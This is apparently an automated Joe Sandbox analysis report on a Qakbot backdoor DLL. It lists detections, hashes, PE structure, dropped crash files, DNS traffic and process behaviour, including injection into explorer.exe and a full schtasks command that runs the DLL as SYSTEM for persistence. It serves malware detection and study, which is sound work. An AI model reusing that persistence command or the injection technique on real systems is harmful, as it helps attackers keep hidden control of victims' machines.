  • rundll32.exe: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures
  • explorer.exe: Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
ZBvNS77A7a.dll | 46% | Virustotal |
ZBvNS77A7a.dll | 60% | ReversingLabs | Win32.Backdoor.Quakbot
ZBvNS77A7a.dll | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Desktop\ZBvNS77A7a.dll | 100% | Joe Sandbox ML |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:490262
Start date:25.09.2021
Start time:10:22:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ZBvNS77A7a.dll
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal92.evad.winDLL@20/10@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 22.6% (good quality ratio 21.6%)
  • Quality average: 76.7%
  • Quality standard deviation: 26.5%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 102
  • Number of non-executed functions: 95
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .dll
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62
  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time | Type | Description
10:23:21 | Task Scheduler | Run new task: payuhfp path: regsvr32.exe s>-s "C:\Users\user\Desktop\ZBvNS77A7a.dll"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e9a58211ba4d9ba1b3cadfec684f66ac60801b0_7a325c51_04ce1181\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11500
Entropy (8bit):3.7763436141995625
Encrypted:false
SSDEEP:192:Wzcub6VYkH/RS5uGXx3RjetM/u7sJS274ItUW:Qcw6Vb/RS5n3jee/u7sJX4ItUW
MD5:463A67AC9E7EC8B0B962C5386749B5EB
SHA1:9932B716AE52E8D904602F53D26727C9DA8F8CB2
SHA-256:50C6047B7D3199121C82DF91533E16362CE4E85BBE34308E8F3A91643E419B65
SHA-512:06825E10486556D11CFC1CB5AD0ED36E63A27ADF107DE3C4AF6687486E299A819094E4D919030B3A2ECA17BE1AEF51DB36743C6F90712FE2951BCDAE89E59A39
Malicious:false
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e9a58211ba4d9ba1b3cadfec684f66ac60801b0_7a325c51_1b176866\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11496
Entropy (8bit):3.7784669961245267
Encrypted:false
SSDEEP:192:Kdzcdb6VVkH/RS5uGXx3RjetM/u7suS274ItUO:KBcJ6Vu/RS5n3jee/u7suX4ItUO
MD5:5A8B6D5D1EA2CD3F25FCB3E2EAC13AA0
SHA1:238C25DC1680448F8C61684641FDBDB6B330C23A
SHA-256:90162554559683001CCA548AF5C6D07754B326EED7F428389958A764AB53DEC1
SHA-512:ED4678FE08C2861F42957B4057FC25CF22D441BDCEEAB005F094885621B8046F7CD2EC5C2F7E586CD56E56A3A9971726BE31186BADEB7992A8F9496D20A65E9C
Malicious:false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C6F.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Sat Sep 25 08:25:06 2021, 0x1205a4 type
Category:dropped
Size (bytes):35026
Entropy (8bit):2.6261355120448786
Encrypted:false
SSDEEP:192:OCLJ0+qAUUFDMiwFHYYEcTAsOW+N8dLOglhcTgpmax9ZnANM:XLOWLF1wFHhPTvoGHhckpjxPSM
MD5:5D31475311D93231DDBCD9BA6BD5BA55
SHA1:7BDFAB76DF8E9B510E25F314B3609C9590004992
SHA-256:B64A5890E8F04D4A6BA99601781CC64D9C6B1536A0781143CBD3DD9F052A3346
SHA-512:C3247C860C7F77EF643B28453AAA64215A86D24484CC882661056C8404CD493AEC831CD2E15A0DA3FD1EBAC84819D0EA9952C7AED7F4BB01F146230D80015621
Malicious:false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E9.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8278
Entropy (8bit):3.6950810684096487
Encrypted:false
SSDEEP:192:Rrl7r3GLNimw6Dqxve6YwDSU+gmfJjSx+pBB89bcbsfi0m:RrlsNih6Z6Y8SU+gmfJjSpcgfg
MD5:F94634BA3AA7A1D7A0BC36B4676D37F4
SHA1:57D96DFC0FB1DF4004A3984443F4D3A1BEB37A00
SHA-256:99BCE543BB148DE22D98A4DA12C00494DE1851984C579314CF178C85E3DB0B39
SHA-512:F8616AE3E68C03B59F132A18F8313369E53407D5C37385C0633098FD077E3BDA69F87E739152BE69C1942337B06345877D6E24C49B041C482A79B0E63C62C10E
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.6.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER653B.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4630
Entropy (8bit):4.465614395578264
Encrypted:false
SSDEEP:48:cvIwSD8zsbJgtWI9jbWSC8BL8fm8M4JkxWFfT+q8zduKJYegd:uITf1AqSNqJnT9qYegd
MD5:A22317ACAD0A7881DEEFD578FD331502
SHA1:8D81BFD8496A4591D9E65D9E59A7D1099C9D94AC
SHA-256:7B5623B3AC94AFF4431845877E8372C08FEEF5FAC00C5577C2BFE54E42711D2A
SHA-512:0CBCB0AB7B9C8102442B7685907DE4D9357F522EFAC9347FF0950879BE1E625267E931C297DDADB09A2B78BDB0699E5ABB466557C23F6537DA1243FF1C9406F9
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1181855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER955.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4630
Entropy (8bit):4.462098660842768
Encrypted:false
SSDEEP:48:cvIwSD8zs0JgtWI9jbWSC8BT8fm8M4JkxWFAgP+q8zd9KJYyRgd:uITfyAqSN2J9POqYyRgd
MD5:C3F41612D9BFFE36894E5765A49D50E3
SHA1:0B38B318423E6242D3F1F55779B7B2089B88F192
SHA-256:073E01EF57E9934CE18E57CBD7B3404B4C8F347D29703EBD80C87B9DBC74CDD1
SHA-512:F34619CF44959E7BFFE6A63D975EAB84BA2A61663508A88AEE3B2DF222A328F3FC43F6CA7553D37447A045AEFBC152B8A45FE212FF00B08D9EB848A5BE6540CA
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1181854" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF241.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Sat Sep 25 08:23:34 2021, 0x1205a4 type
Category:dropped
Size (bytes):35382
Entropy (8bit):2.6628405818008596
Encrypted:false
SSDEEP:384:z6pIXEp7k/8JpD1iDWmUrgnGwhctnFl9h:zUg/srrM9ctndh
MD5:91DF5FF5B9BC1DA3D1644ECA8FBB2F8E
SHA1:E49D85C5C4A9D110B3DE839FE920C877893BB7F2
SHA-256:5430CB813F7DB685ECEB2F6FD30264D0A7396769BB6A96CD302773ABC871D819
SHA-512:BF86BDCDBE3B3B9BBF3338758B8835A2AA8211D0FD1D8A64D5A361832D77C037606B747909082756BA6A650D48DC2525D48EB20A7F02B956398F23C7A7EA147C
Malicious:false
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFEE.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8282
Entropy (8bit):3.695195907500495
Encrypted:false
SSDEEP:192:Rrl7r3GLNipFd676YB+MSUBgmfJjSx+pBB89bpisfLajm:RrlsNipv676YBlSUBgmfJjSpphfT
MD5:7E717EA850E4710974F964DA9347D310
SHA1:80858E5218A190A1BD271098947A15BF1422A4FA
SHA-256:2843D9EBCCD91B310DE9C2661F45278B4EED0DC5A83A18B5FCC791577EBE84F0
SHA-512:752BC595A439DB591B5E7AF93408FAE2793BAD55F3501D139DD01B9CFBFC57F33D38BD05C39B2B09819B83C594C26152E40E75F7C28937FB90BE5BDAFFBC073B
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.4.4.<./.P.i.d.>.......
C:\Users\user\Desktop\ZBvNS77A7a.dll
Process:C:\Windows\SysWOW64\explorer.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):330189
Entropy (8bit):2.2090413355109213
Encrypted:false
SSDEEP:1536:/IUtVWns2GwmzYSbbz1j+xEXnQud+3VLuoXBYjPYH+ryO3O:/ZVWsP/sSb1ax0A3tDXBYjPYH+ryyO
MD5:9147A4BB8EFF884F129AAD7E0C68D1C5
SHA1:BA7E1C01F60E38FA8E0C420332BEAA82B647400D
SHA-256:31682BA44B1B11AC8C4F9FDE98E63AFCF32D7AD143587FA631496E83464FF7C3
SHA-512:46810C2FEE829EDF0FA52FD75DD25DAF32F2064629EF778BF94A73A54CBCE07770303F52B16808DFC97C3ED3C81188BFE4AF1491F6B98FD5DC8A679F8F24FDDE
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.5705642690440875
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.40%
  • Win16/32 Executable Delphi generic (2074/23) 0.21%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:ZBvNS77A7a.dll
File size:330189
MD5:6484d8ffd4a6de7947534571e9907b4e
SHA1:41e1cbd037698c3329db4edfe4e6b28b0654e94c
SHA256:64a6039b2b3a347312f56170b5eb7deebe6d37ef6fb414fb929e84be4799dfa5
SHA512:5545f50a5c5d2367c03a199832ff78d00fa7f172017007ba0e45c75190640cd79540d351db14279d3a505014ff380a12e00f796ec08038634f4d3641a61b7da0
SSDEEP:6144:9/st+16ZWiobj+n5QZRO0Xj/Ee+aRLvccAOPyI:A+QoOaEFA7RD

File Icon

Icon Hash:aca9a8acaca6a888

Static PE Info

General

Entrypoint:0x100019a1
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:0x613B8C85 [Fri Sep 10 16:49:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:6527345f9aee9363b094aad01304de88

Entrypoint Preview

Instruction
push 00000000h
push ebp
mov ebp, esp
add esp, FFFFFFF4h
call 00007FA5388AF212h
cmp ebx, eax
je 00007FA5388AC9B9h
pushad
add edi, ebx
inc ecx
add ecx, eax
push eax
push ecx
push 00000025h
cmp dword ptr [ebx+00433230h], 00000000h
jne 00007FA5388AC72Eh
push 00000000h
call dword ptr [ebx+00435A3Ch]
push ecx
and ecx, 00000000h
xor ecx, eax
and dword ptr [ebx+00433230h], 00000000h
or dword ptr [ebx+00433230h], ecx
pop ecx
cmp dword ptr [ebx+004333D8h], 00000000h
jne 00007FA5388AC7B2h
cmp dword ptr [ebx+0043384Ch], 00000000h
jne 00007FA5388AC730h
call dword ptr [ebx+00435A38h]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
xor ecx, eax
and dword ptr [ebx+0043384Ch], 00000000h
or dword ptr [ebx+0043384Ch], ecx
mov ecx, dword ptr [ebp-04h]
push dword ptr [ebx+00433490h]
cmp dword ptr [ebx+0043342Ch], 00000000h
jne 00007FA5388AC733h
lea eax, dword ptr [ebx+0043325Ch]
push eax
call dword ptr [ebx+00435A24h]
push edi
xor edi, dword ptr [esp]
xor edi, eax
and dword ptr [ebx+0043342Ch], 00000000h
xor dword ptr [ebx+0043342Ch], edi
pop edi
push FFFFFFDEh
cmp dword ptr [ebx+004332F8h], 00000000h
jne 00007FA5388AC72Ch
call dword ptr [ebx+00435A34h]
push edx
and edx, 00000000h
xor edx, eax
and dword ptr [ebx+004332F8h], 00000000h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x35a6c | 0x78 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4034000 | 0x162e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x35a00 | 0x6c | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x30974 | 0x30a00 | False | 0.564327602828 | data | 6.10041951577 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x1000 | 0x800 | False | 0.01123046875 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data | 0x33000 | 0x4000c64 | 0x3000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x4034000 | 0x162e0 | 0x16400 | False | 0.151454968399 | data | 4.89622756249 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x40343d0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x4044bf8 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x40471a0 | 0x10a8 | data | English | United States
RT_ICON | 0x4048248 | 0x988 | data | English | United States
RT_MENU | 0x4048bd0 | 0x2d4 | data | English | United States
RT_MENU | 0x4048ea4 | 0x196 | data | English | United States
RT_MENU | 0x404903c | 0x1a6 | data | English | United States
RT_MENU | 0x40491e4 | 0xb8 | data | English | United States
RT_STRING | 0x404929c | 0x934 | data | English | United States
RT_STRING | 0x4049bd0 | 0x4a8 | data | English | United States
RT_RCDATA | 0x404a078 | 0x23 | data | English | United States
RT_RCDATA | 0x404a09c | 0xc | data | English | United States
RT_RCDATA | 0x404a0a8 | 0xf | data | English | United States
RT_RCDATA | 0x404a0b8 | 0x24 | data | English | United States
RT_RCDATA | 0x404a0dc | 0x2d | data | English | United States
RT_GROUP_ICON | 0x404a10c | 0x46 | data | English | United States
RT_MANIFEST | 0x404a154 | 0x18a | XML 1.0 document, ASCII text | English | United States

Imports

DLL | Import
kernel32.dll | GetProcAddress, LoadLibraryA, VirtualAlloc, VirtualProtect, GetCurrentThread
user32.dll | CheckDlgButton, GetCursorInfo, CheckMenuRadioItem, GetCaretBlinkTime, CheckRadioButton, GetCapture, CheckMenuItem
ole32.dll | CoCreateGuid, CoGetCurrentLogicalThreadId, CoFileTimeNow, OleUninitialize, CoGetContextToken, CoFreeUnusedLibraries, CoGetCurrentProcess, OleInitialize
advapi32.dll | LsaOpenTrustedDomain

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2021 10:22:56.624871016 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:22:56.648972034 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:29.761882067 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:29.790786028 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:56.157160997 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:56.209856033 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:56.811824083 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:56.893886089 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:57.427287102 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:57.446943998 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:57.723603964 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:57.753066063 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:57.809922934 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:57.855709076 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:58.297625065 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:58.317385912 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:58.721641064 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:58.741311073 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:59.169665098 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:59.232000113 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:23:59.971780062 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:23:59.991473913 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:24:00.670408964 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:24:00.695043087 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:24:01.096482038 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:24:01.116421938 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:24:11.056459904 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:24:11.078437090 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:24:45.691792965 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:24:45.709078074 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:24:46.783740044 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:24:46.817936897 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Sep 25, 2021 10:25:18.700589895 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Sep 25, 2021 10:25:18.728830099 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4

System Behavior

General

Start time:10:23:08
Start date:25/09/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:0x2e0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:09
Start date:25/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:10
Start date:25/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Imagebase:0x370000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:15
Start date:25/09/2021
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x1020000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:17
Start date:25/09/2021
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x1020000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:19
Start date:25/09/2021
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37
Imagebase:0x8b0000
File size:185856 bytes
